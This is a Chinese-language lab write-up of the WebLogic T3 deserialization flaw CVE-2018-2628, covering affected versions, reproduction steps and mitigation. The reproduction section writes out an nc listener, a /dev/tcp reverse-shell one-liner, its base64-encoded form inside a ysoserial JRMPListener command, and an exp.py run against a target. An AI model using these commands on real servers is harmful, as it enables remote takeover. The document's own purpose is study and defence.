这个漏洞因为java版本问题一直下载不了ysoserial反序列化工具，没办法生成payload。这里记录一下漏洞原理。

一、漏洞简介

Weblogic Server中的RMI 通信使用T3协议在Weblogic Server和其它Java程序（客户端或者其它Weblogic Server实例）之间传输数据, 服务器实例会跟踪连接到应用程序的每个Java虚拟机（JVM）中, 并创建T3协议通信连接, 将流量传输到Java虚拟机。T3协议在开放WebLogic控制台端口的应用上默认开启。攻击者可以通过T3协议发送恶意的的反序列化数据, 进行反序列化, 实现对存在漏洞的weblogic组件的远程代码执行攻击（开放Weblogic控制台的7001端口，默认会开启T3协议服务，T3协议触发的Weblogic Server WLS Core Components中存在反序列化漏洞，攻击者可以发送构造的恶意T3协议数据，获取目标服务器权限。）

二、影响版本

Oracle Weblogic Server10.3.6.0.0

Oracle Weblogic Server12.1.3.0.0

Oracle Weblogic Server12.2.1.2.0

Oracle Weblogic Server12.2.1.3.0

三、漏洞复现

扫描靶场查看有没有开启t3协议(T3 协议是 Oracle WebLogic Server 使用的一种通信协议，它用于在 WebLogic Server 节点之间进行通信。T3 协议是基于 Java 的 RMI（远程方法调用）协议的一种扩展，它提供了可靠的、高性能的、面向对象的远程通信机制。)，和weblogic版本

nmap -n -v -p 7001,7002 192.168.116.144 --script=weblogic-t3-info 

 

1、使用ysoserial启动一个JMRP Server

nc -lvvp 9090

2、JMRP Server开启监听请求，向目标服务器发送序列化的bash反弹shell命令

sh -i >& /dev/tcp/192.168.116.144/9999 0>&1
#反弹shell命令,由于Runtime.getRuntime().exec()中不能使用重定向和管道符，这里需要对其进行base64编码再使用
bash -c {echo,c2ggLWkgPiYgL2Rldi90Y3AvMTkyLjE2OC4xMDAuMS85OTk5IDA+JjE=}|{base64,-d}|{bash,-i}
#开启JMRP Server服务并发送反弹shell
java -cp ysoserial-all.jar ysoserial.exploit.JRMPListener 7777 CommonsCollections3 "bash -c {echo,c2ggLWkgPiYgL2Rldi90Y3AvMTkyLjE2OC4xMDAuMS85OTk5IDA+JjE=}|{base64,-d}|{bash,-i}"

3、接下来使用CVE-2018-2628的 EXP 向目标WebLogic服务器发送攻击载荷（payload）

python2 exp.py 192.168.100.134 7001 ysoserial-all.jar 192.168.116.144 7777 JRMPClient
#exp.py原理是利用 T3 协议通信与目标主机进行交互，并利用 ysoserial 工具生成的 payload 来触发目标系统的远程代码执行漏洞

4、查看监听端口

 四、修复建议

此漏洞产生于Weblogic T3服务，当开放Weblogic控制台端口（默认为7001端 口）时，T3服务会默认开启。关闭T3服务，或控制T3服务的访问权限，能防护 该漏洞。对于不在Oracle官方支持范围内的版本，由于没有最新补丁，推荐采用 此种方式进行修复。同时，Weblogic采用黑名单的方式进行反序列化漏洞的修 复，存在被绕过的风险，因此控制T3服务为防护Weblogic RMI这类反序列化漏 洞的有效方式。控制T3服务方式：

1、进入Weblogic控制台，在base_domain的配置页面中，进入“安全”选项卡页面， 点击“筛选器”，进入连接筛选器配置。 在连接筛选器中输入：weblogic.security.net.ConnectionFilterImpl，

在连接筛 选器规则中输入：127.0.0.1 * * allow t3 t3s，0.0.0.0/0 * * deny t3 t3s(t3和t3s 协议的所有端口只允许本地访问)。 保存后需重新启动，规则方可生效。

2. 更新Oracle官方发布的最新补丁，同时升级jdk至1.7.0.21以上版本。